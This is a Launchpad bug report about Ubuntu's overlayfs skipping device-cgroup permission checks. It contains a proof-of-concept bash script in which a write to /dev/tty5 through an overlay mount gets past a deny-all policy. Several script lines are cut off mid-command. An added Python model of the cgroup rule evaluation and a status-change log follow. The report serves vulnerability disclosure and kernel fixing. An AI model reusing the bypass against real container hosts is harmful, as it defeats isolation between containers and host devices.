overlayfs does not honor lxc-related permissions
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
linux (Ubuntu) | Fix Released | High | Andy Whitcroft |
Oneiric | Fix Released | High | Andy Whitcroft |
Precise | Fix Released | High | Andy Whitcroft |
lxc (Ubuntu) | Invalid | Undecided | Unassigned |
Oneiric | Invalid | Undecided | Unassigned |
Precise | Invalid | Undecided | Unassigned |
Bug Description
Using overlayfs with lxc causes tty problems that can kill X. Overlayfs needs to honor the device cgroup permission checks that the normal VFS path performs, per the following information from Serge.
"""
here is a script which you can use to test the overlayfs
issue:
```bash
#!/bin/bash
ddir=`cat /proc/self/
if [ "x$ddir" = "x" ]; then
echo "couldn't find devices cgroup mountpoint"
exit 1
fi
# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`
# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`
# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`
mount -t overlayfs -oupperdir=
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"
# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"
# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"
umount $odir
rmdir $odir
rm -rf $udir
# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
```
The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.
fs/overlayfs/
of what fs/namei.
devcgroup_
"""
[This blocks resolution of bug 914169]
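The script above relies on the semantics of the cgroup-v1 devices controller: "echo a > devices.deny" switches the group to deny-all, and "echo 'c 4:5 m' > devices.allow" adds a single exception that permits only mknod of char 4:5 (/dev/tty5), never a write. The following is an added example, not code from the bug report or from the kernel: a simplified Python model of how kernel/security/device_cgroup.c evaluates such a policy, replaying the script's rules to show what the kernel-side check must answer for each access in the script (the bug on this page is that overlayfs skipped that check for the overlay path, so the write to $odir/tty5 went through). The class and function names are this example's own; the behaviour-plus-exceptions model and the devices.list output follow the kernel's documented v1 interface.

```python
"""Simplified model of cgroup-v1 devices controller rule evaluation.

Added example (not from the bug report or the kernel). A cgroup has a default
behaviour (allow-all or deny-all) plus a list of exceptions; the kernel's
devcgroup_inode_permission()/devcgroup_inode_mknod() hooks consult it.
"""
from dataclasses import dataclass, field
from typing import Optional

ACCESS_BITS = "rwm"          # read, write, mknod


@dataclass(frozen=True)
class DevException:
    dev_type: str                  # 'b' (block) or 'c' (char)
    major: Optional[int]           # None means '*'
    minor: Optional[int]
    access: frozenset              # subset of {'r', 'w', 'm'}

    def matches_device(self, dev_type, major, minor):
        return (self.dev_type == dev_type
                and self.major in (None, major)
                and self.minor in (None, minor))

    def as_text(self):
        maj = "*" if self.major is None else self.major
        mino = "*" if self.minor is None else self.minor
        acc = "".join(b for b in ACCESS_BITS if b in self.access)
        return f"{self.dev_type} {maj}:{mino} {acc}"


def parse_rule(text):
    """Parse devices.allow/devices.deny syntax: 'a', 'c 4:5 m', 'b *:* rw'."""
    parts = text.split()
    if not parts or parts[0] not in ("a", "b", "c"):
        raise ValueError(f"bad device type in rule {text!r}")
    dev_type = parts[0]
    if dev_type == "a":                       # all devices, all access
        return "a", None, None, frozenset(ACCESS_BITS)
    major_s, minor_s = parts[1].split(":")
    major = None if major_s == "*" else int(major_s)
    minor = None if minor_s == "*" else int(minor_s)
    access = frozenset(parts[2]) if len(parts) > 2 else frozenset(ACCESS_BITS)
    if not access <= set(ACCESS_BITS):
        raise ValueError(f"bad access bits in rule {text!r}")
    return dev_type, major, minor, access


@dataclass
class DevicesCgroup:
    behavior: str = "allow"                    # root default: allow everything
    exceptions: list = field(default_factory=list)

    def _write(self, filename, text):
        dev_type, major, minor, access = parse_rule(text)
        if dev_type == "a":
            # 'a' resets the whole policy: deny-all or allow-all, no exceptions
            self.behavior = "deny" if filename == "devices.deny" else "allow"
            self.exceptions = []
            return
        # devices.allow adds exceptions in deny mode; devices.deny adds them
        # in allow mode; the opposite file strips access bits from a match.
        adds = (filename == "devices.allow") == (self.behavior == "deny")
        if adds:
            self.exceptions.append(DevException(dev_type, major, minor, access))
            return
        kept = []
        for old in self.exceptions:
            if (old.dev_type, old.major, old.minor) == (dev_type, major, minor):
                remaining = old.access - access
                if remaining:
                    kept.append(DevException(dev_type, major, minor, remaining))
            else:
                kept.append(old)
        self.exceptions = kept

    def deny(self, rule):
        self._write("devices.deny", rule)

    def allow(self, rule):
        self._write("devices.allow", rule)

    def devices_list(self):
        """What 'cat devices.list' shows: only exceptions in deny mode."""
        if self.behavior == "allow":
            return ["a *:* rwm"]
        return [ex.as_text() for ex in self.exceptions]

    def permits(self, dev_type, major, minor, access):
        """Model of the devcgroup_inode_permission()/_mknod() decision."""
        wanted = frozenset(access)
        if self.behavior == "deny":
            # allow-list: some exception must cover every requested bit
            return any(ex.matches_device(dev_type, major, minor)
                       and wanted <= ex.access for ex in self.exceptions)
        # deny-list: any exception touching a requested bit denies
        return not any(ex.matches_device(dev_type, major, minor)
                       and wanted & ex.access for ex in self.exceptions)


TTY5 = ("c", 4, 5)      # /dev/tty5 is char major 4, minor 5


def replay_bug_script():
    """Apply the policy from Serge's script; report what the kernel must answer."""
    cg = DevicesCgroup()
    cg.deny("a")              # echo a > $ndir/devices.deny
    cg.allow("c 4:5 m")       # echo "c 4:5 m" > $ndir/devices.allow
    return {
        "devices.list": cg.devices_list(),
        "write /dev/tty5": cg.permits(*TTY5, "w"),         # must be denied
        "mknod tty5 in upperdir": cg.permits(*TTY5, "m"),  # copy-up needs this
        "write $odir/tty5": cg.permits(*TTY5, "w"),        # must also be denied
    }


if __name__ == "__main__":
    for name, result in replay_bug_script().items():
        print(f"{name}: {result}")
```

Running it shows the policy permitting only the mknod: both writes to 4:5 come back denied, which is the result the script expects for $odir/tty5 once overlayfs routes its copy-up and write through the same device cgroup hooks as the regular VFS path.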
Changed in launchpad:
  status: New → Triaged
  importance: Undecided → High
Changed in lxc (Ubuntu):
  importance: Undecided → Medium
affects: launchpad → linux
no longer affects: linux
Changed in linux (Ubuntu):
  importance: Undecided → High
  assignee: nobody → Andy Whitcroft (apw)
  status: New → In Progress
  security vulnerability: no → yes
Changed in lxc (Ubuntu):
  status: New → Invalid
tags: added: patch
Changed in linux (Ubuntu):
  status: In Progress → Fix Committed
Changed in linux (Ubuntu Oneiric):
  status: New → Fix Committed
  importance: Undecided → High
  assignee: nobody → Andy Whitcroft (apw)
Changed in lxc (Ubuntu Oneiric):
  status: New → Invalid
Changed in lxc (Ubuntu Precise):
  importance: Medium → Undecided
Proposed patch for Precise